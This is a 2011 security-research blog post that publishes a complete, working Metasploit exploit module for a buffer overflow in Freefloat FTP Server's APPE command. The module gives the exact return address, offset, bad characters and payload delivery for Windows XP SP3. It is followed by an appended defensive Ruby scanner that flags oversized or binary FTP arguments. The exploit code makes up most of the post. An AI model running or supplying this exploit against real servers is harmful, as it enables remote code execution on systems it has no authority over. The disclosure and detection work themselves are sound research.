Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member Veerendra G.G wrote a Metasploit module for the Freefloat FTP Server APPE command overflow vulnerability.

Sep 6, 2011, by Veerendra GG

Metasploit module:

##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Freefloat FTP Server APPE Command Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow vulnerability
                    found in the APPE command in the Freefloat FTP server.
            },
            'Author'         =>
                [
                    'veerendragg @ SecPod', # Initial Discovery
                    'veerendragg @ SecPod'  # Metasploit Module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1.0 $',
            'References'     =>
                [
                    [ 'URL', 'https://www.secpod.com/blog/?p=310' ],
                    [ 'URL', 'https://www.secpod.com/blog/?p=353' ],
                    [ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
                    [ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space' => 500,
                    'BadChars' => "\x00\x0a\x0d",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [
                        'Windows XP SP3 EN',
                        {
                            'Ret' => 0x7e429353, # jmp esp from user32.dll
                            'Offset' => 246
                        }
                    ],
                ],
            'DisclosureDate' => 'Aug 07 2011',
            'DefaultTarget' => 0))
    end

    def exploit
        connect_login
        print_status("Trying target #{target.name}...")
        buf = make_nops(target['Offset'])
        buf << [target.ret].pack('V')
        buf << make_nops(30)
        buf << payload.encoded

        print_status("Sending exploit buffer...")
        send_cmd( ['APPE', buf] , false )

        handler
        disconnect
    end

end

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team
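
For defenders, the module's target entry gives a concrete threshold: on the listed target the saved return address sits 246 bytes into the APPE argument. The Ruby check below is an added example, not part of the SecPod module or of Metasploit; `scan_ftp_commands`, `Finding` and the sample lines are constructed for illustration, and it applies the length test to every FTP verb rather than to APPE alone.

```ruby
# Added example: flag FTP control-channel commands whose argument is long
# enough to run past the offset given in the module's target entry.

# From the module above: 246 bytes of APPE argument precede the
# overwritten return address on the listed target.
RET_OFFSET = 246

Finding = Struct.new(:line_no, :verb, :arg_len, :binary_bytes, :reasons)

# Split one control-channel line into [VERB, argument], binary-safe.
def parse_ftp_command(raw)
  line = raw.b.sub(/\r?\n\z/n, '')
  verb, arg = line.split(' '.b, 2)
  [verb.to_s.upcase, arg.to_s]
end

# Return a Finding for each command whose argument is longer than `limit`
# or contains bytes outside printable ASCII (a heuristic chosen for this
# example; servers that accept UTF-8 file names will need it relaxed).
def scan_ftp_commands(lines, limit: RET_OFFSET)
  lines.each_with_index.filter_map do |raw, i|
    verb, arg = parse_ftp_command(raw)
    binary = arg.bytes.count { |b| b < 0x20 || b > 0x7e }
    reasons = []
    reasons << :oversized_argument if arg.bytesize > limit
    reasons << :binary_in_argument if binary.positive?
    Finding.new(i + 1, verb, arg.bytesize, binary, reasons) unless reasons.empty?
  end
end

# Constructed sample lines (not captured from a real server).
SAMPLE = [
  "USER anonymous\r\n",
  "APPE logs/app.log\r\n",
  "APPE " + ("A" * 300) + "\r\n",   # inert filler, longer than the offset
  "APPE report\xff\xfe.txt\r\n".b,  # raw high bytes in a file name
  "STOR backup.zip\r\n"
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_ftp_commands(SAMPLE).each do |f|
    puts "line #{f.line_no}: #{f.verb} arg=#{f.arg_len}B " \
         "binary=#{f.binary_bytes} #{f.reasons.join(',')}"
  end
end
```

The same length limit can be enforced inline at an FTP proxy or IDS; a production limit would normally sit well below 246 bytes, since legitimate APPE paths are short.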